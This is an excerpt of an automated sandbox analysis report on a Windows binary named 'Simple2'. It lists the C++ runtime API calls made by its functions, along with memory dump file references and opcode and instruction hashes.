            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876BB1BE
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
            • String ID:
            • API String ID: 594857686-0
            • Opcode ID: b5572d8f91ff3c0af187336c7321391bdae280d0e8a128b9ee9ed201f7d0ffee
            • Instruction ID: 4422f30613ef139de91f4dc147ba7d7c78c2531c568574e37793c1b19de037cc
            • Opcode Fuzzy Hash: b5572d8f91ff3c0af187336c7321391bdae280d0e8a128b9ee9ed201f7d0ffee
            • Instruction Fuzzy Hash: 52E0B600E99207C5FDAA63A2184607900823F973B8E1C1B38FA7D842D2ED1CB4D6E650
            APIs
            • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140 ref: 00007FF6876B96C5
            • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140 ref: 00007FF6876B96D1
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6876B96DA
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: D@std@@@std@@U?$char_traits@V12@$?flush@?$basic_ostream@_?put@?$basic_ostream@?widen@?$basic_ios@U?$char_traits@_W@std@@@std@@
            • String ID:
            • API String ID: 2670548386-0
            • Opcode ID: f7284e140304bf78685db437509e0c3193b840c890769990208ee4664a5f1153
            • Instruction ID: 5e4684e13d9b5bb44f61bdf919aaa7c094cd534ffce7e6bd25e519d1f1b374d9
            • Opcode Fuzzy Hash: f7284e140304bf78685db437509e0c3193b840c890769990208ee4664a5f1153
            • Instruction Fuzzy Hash: 55D01711A88A0AC2DE099F26B8940381324FF8AF82B08A031DD0F8A310CE3CE099D200
            APIs
            • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF6876B98E5
            • ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z.MSVCP140 ref: 00007FF6876B98F1
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6876B98FA
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?put@?$basic_ostream@_?widen@?$basic_ios@_V12@V12@_
            • String ID:
            • API String ID: 2094784882-0
            • Opcode ID: 23e708a2569c3426e87b7543450fb33ca15486ce26cdfbe756c9933b9681a608
            • Instruction ID: c055d51759ea39fd7a328545f6d72896bf1020a9d9a415b879483a31eec485dc
            • Opcode Fuzzy Hash: 23e708a2569c3426e87b7543450fb33ca15486ce26cdfbe756c9933b9681a608
            • Instruction Fuzzy Hash: 15D01754A88A06C2EE099F36BC941381320BF8AF56B08A030DD0F8B320CE3CE0D5D200
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: _fseeki64fgetpos
            • String ID:
            • API String ID: 3401907645-0
            • Opcode ID: ecb6472a7ce75e62892e83f98b80271a100afabbccfad88630939b55a3a0e4aa
            • Instruction ID: f053b5a10c812f8729879664ea150db856884bf20f507e0b8679a37ab03b4de3
            • Opcode Fuzzy Hash: ecb6472a7ce75e62892e83f98b80271a100afabbccfad88630939b55a3a0e4aa
            • Instruction Fuzzy Hash: 23313C32644B51C1EF608F2AE54036963A4FF4ABA8F148139DE5C877A4DF38E4D6D300
            APIs
            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF6876B19FD), ref: 00007FF6876B7146
            • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF6876B19FD), ref: 00007FF6876B7157
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: D@std@@@std@@Init@?$basic_streambuf@U?$char_traits@fclose
            • String ID:
            • API String ID: 356833432-0
            • Opcode ID: 396b18110c7e3b0189c6318ad677061b51005803ba6b4c43fc7aa01835824bc1
            • Instruction ID: 14331fe25f3b99a5ddb2f95678a4ff9773e7416e67e58319bb200f9dbf0c0036
            • Opcode Fuzzy Hash: 396b18110c7e3b0189c6318ad677061b51005803ba6b4c43fc7aa01835824bc1
            • Instruction Fuzzy Hash: 31215776649B81C4DB458F39E85436833A4FB8AF58F08803ADE4D8B368DF38E489D350
            APIs
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B7840
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID:
            • API String ID: 3668304517-0
            • Opcode ID: 1d1de893edc6c783063b8b228a586221ff2b8e1a473930f49e6a63a8e275ccf9
            • Instruction ID: 09de14fcecc022e4b3c8a93380578db63c255d99b705a638be8f5ee40b2e2466
            • Opcode Fuzzy Hash: 1d1de893edc6c783063b8b228a586221ff2b8e1a473930f49e6a63a8e275ccf9
            • Instruction Fuzzy Hash: E5211076A09B48C5EF058F69D49022C3366FB49FA9B54803AEE0D87368DF38E880D340
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: memcpy
            • String ID:
            • API String ID: 3510742995-0
            • Opcode ID: c4fad891f8838a3ff896bec8dfd8e97697a670428b7c90bc6bf96c2d856b4e86
            • Instruction ID: 382cc0472908ba1563b40efc2a2638181ebfadd9189fad806128f9bb7e5683ca
            • Opcode Fuzzy Hash: c4fad891f8838a3ff896bec8dfd8e97697a670428b7c90bc6bf96c2d856b4e86
            • Instruction Fuzzy Hash: CB018C62B08B9481DE009B1AE20006DA365FB45FC8B188536EF5C57B59DF39E5E2D740
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
            • String ID:
            • API String ID: 313767242-0
            • Opcode ID: 40a82ec271f847dec9676bbcc0cd14d7ff99cb64b702a5e9aa7045d9a1604bc8
            • Instruction ID: af315fdc1587317494d2945009a201fa8a059a031fccf04d95e7692f181b51e2
            • Opcode Fuzzy Hash: 40a82ec271f847dec9676bbcc0cd14d7ff99cb64b702a5e9aa7045d9a1604bc8
            • Instruction Fuzzy Hash: 70314F72648B81C6EF648F60E8403E97364FB85748F44403EEA4E87B99DF38E688C714
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
            • String ID:
            • API String ID: 2933794660-0
            • Opcode ID: b368277a78d8b3f94a862b1491a1e397c34f224aaa5acd5c28a1d5999610dac7
            • Instruction ID: 4a91160771c249c2ea7448f2df2d7a20a113d75398af1dcce6c796185b11059e
            • Opcode Fuzzy Hash: b368277a78d8b3f94a862b1491a1e397c34f224aaa5acd5c28a1d5999610dac7
            • Instruction Fuzzy Hash: 38111822B98B01CAEF00CF60E8552A833A4FB59758F441E39EA6D867A4DF7CE194D340
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 01b6ad167b3f27702ef763fa15e21f823dd2f1c85ce527116d74a973a60dd82a
            • Instruction ID: b65b7a16d78f7261c48636f682595e41fc813909e34734530396852b6597a78a
            • Opcode Fuzzy Hash: 01b6ad167b3f27702ef763fa15e21f823dd2f1c85ce527116d74a973a60dd82a
            • Instruction Fuzzy Hash: 21A0012199C806D5EA848B00A8501202620FF62344B444039E00E851A0DF2CB481E641
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$?out@?$codecvt@Mbstatet@@Mbstatet@@@std@@
            • String ID:
            • API String ID: 2436281117-0
            • Opcode ID: c35718d7f45bae69353885bd83bef6c1f398237b3a592e7714d8fa48c5d193b3
            • Instruction ID: 50d7e5b64fededd052903743922b2457cd5626048c4a590c4bfa3bdc9bed1b6f
            • Opcode Fuzzy Hash: c35718d7f45bae69353885bd83bef6c1f398237b3a592e7714d8fa48c5d193b3
            • Instruction Fuzzy Hash: 95D1BE62B99B46D9EF10CB64E4803BC2761BF46798F004239EA6D93B95DF38A4C5E340
            APIs
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6876BAF35
            • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6876BAF55
            • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6876BAF65
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6876BAFAC
            • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF6876BAFD9
            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6876BAFFA
            • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6876BB040
            • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6876BB047
            • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6876BB054
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
            • String ID:
            • API String ID: 1135186806-0
            • Opcode ID: 4a409d9eeddde9c16bf3bdc8983f7975c11a2b7358316a83c88b2511ec656938
            • Instruction ID: 28b8c2df7b7bb6141eee018c12b3732f2c9e2cdc067e303efc4f1ec714f7e6c3
            • Opcode Fuzzy Hash: 4a409d9eeddde9c16bf3bdc8983f7975c11a2b7358316a83c88b2511ec656938
            • Instruction Fuzzy Hash: ED510372648A41C1EF218F19D590638A7A4FF86F95B198536EE5E87760CF3DF486E300
            APIs
            • ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z.MSVCP140 ref: 00007FF6876B8DF6
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B8FA3
              • Part of subcall function 00007FF6876B9D40: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00007FF6876BA81F), ref: 00007FF6876B9E58
            • memcpy.VCRUNTIME140 ref: 00007FF6876B8EAE
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B90BE
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B910E
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876B9115
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876B911B
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskmemcpy$?in@?$codecvt@Mbstatet@@Mbstatet@@@std@@
            • String ID:
            • API String ID: 3138728058-0
            • Opcode ID: 1e04a5bdb626a9c4a73a7f345a6a19f7d01a1b3ec723d73c288f4c7877c58207
            • Instruction ID: 393b30a655e0935cb0a547e10acf9c904862dafe3032a71cce672ead48fab9c3
            • Opcode Fuzzy Hash: 1e04a5bdb626a9c4a73a7f345a6a19f7d01a1b3ec723d73c288f4c7877c58207
            • Instruction Fuzzy Hash: 64B1AF62F58B46D9EF10CB64E4842BC2372BF5A798F404639EA5D93B98DF38E184D340
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: fgetc
            • String ID:
            • API String ID: 2807381905-0
            • Opcode ID: 072bb3de7d519cac7f9343eb4e3480f148f3df6cbb5292a01ee6b5cf286d2ff5
            • Instruction ID: af712edd748ffccf56bbc0cd6a5dd1463fcf5befc0c8888fbdd9e237f5baf4b4
            • Opcode Fuzzy Hash: 072bb3de7d519cac7f9343eb4e3480f148f3df6cbb5292a01ee6b5cf286d2ff5
            • Instruction Fuzzy Hash: 0D915732B58A41D9EF00CF65D4902AC37B4FB4AB68F54523AEA5D93B94DF38E4A4D340
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
            • String ID:
            • API String ID: 1775671525-0
            • Opcode ID: bc9af6944278223db16352bb2e35be7db60499c09766f561182b432a1841f365
            • Instruction ID: b845cc450d591f3caa0fd200878476fcda2eb2e3f3d17b8207dae8abc30f3d14
            • Opcode Fuzzy Hash: bc9af6944278223db16352bb2e35be7db60499c09766f561182b432a1841f365
            • Instruction Fuzzy Hash: AE51B022E44B85D1EE14AF25D50426C23A0FF56B98F544A3AEE6D827C5DF38F5D4E380
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
            • String ID:
            • API String ID: 1775671525-0
            • Opcode ID: abe0249c4c47600703d981be10a5cbf7c4064d86d09350d8db766f4bae7910eb
            • Instruction ID: dab54210fa819ccc4a079741023f0b7210ba45ad3d64643325fff058dddbc870
            • Opcode Fuzzy Hash: abe0249c4c47600703d981be10a5cbf7c4064d86d09350d8db766f4bae7910eb
            • Instruction Fuzzy Hash: B851BF22A48B85D2EE109F25D5402A92361FF16B88F144A3AEF6D87792CF39F5D5F340
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
            • String ID:
            • API String ID: 762505753-0
            • Opcode ID: 545df3c9766ed185f8b794c35ee2b3ec209f071c21cbcf1c646a21f7ed853349
            • Instruction ID: 69fbbad059d8081f9d8149d00ac2eb524e1c428dea41661394aa719c299c67e3
            • Opcode Fuzzy Hash: 545df3c9766ed185f8b794c35ee2b3ec209f071c21cbcf1c646a21f7ed853349
            • Instruction Fuzzy Hash: 0A312D22A4CB45C1EE149F11E84016A7760FF9AB94F480639EA9E87769DF3CF495D700
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
            • String ID:
            • API String ID: 1155477157-0
            • Opcode ID: 54456fb226a2d7c7d240bc23e780d75a44e7be6d1e2b0709989bf0961fbeec99
            • Instruction ID: 1f720c1810a9b5b7aae6e9aff79aba7d2ca0f0716222d4293ca6f92c7a31b623
            • Opcode Fuzzy Hash: 54456fb226a2d7c7d240bc23e780d75a44e7be6d1e2b0709989bf0961fbeec99
            • Instruction Fuzzy Hash: 7B41FD62B58A41D1EE109B16E5442AD6361BF4ABE0F444739EE7E87BD4EE3CE181E300
            APIs
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000002,?,00007FF6876B8A88), ref: 00007FF6876B80FB
            • memcpy.VCRUNTIME140(?,00000002,?,00007FF6876B8A88), ref: 00007FF6876B8121
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876B813C
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF6876B8A88), ref: 00007FF6876B81A5
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF6876B8A88), ref: 00007FF6876B81AE
              • Part of subcall function 00007FF6876BB188: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6876B1079), ref: 00007FF6876BB1A2
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_iostream@Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmallocmemcpy
            • String ID:
            • API String ID: 4149368473-0
            • Opcode ID: cbfba76095db0698a1e6b8acad4051a1a7fb9d4643fbb1d71c4cadcb9687b4a4
            • Instruction ID: b5459e36199f9f493a5b384dbe93fa1621c5d658c9ae98aa144150698d58f519
            • Opcode Fuzzy Hash: cbfba76095db0698a1e6b8acad4051a1a7fb9d4643fbb1d71c4cadcb9687b4a4
            • Instruction Fuzzy Hash: 4241A322B49B42C1EE559B25E4803A863A0FF45BA4F148639EB2D477D6DF38E4D6D340
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
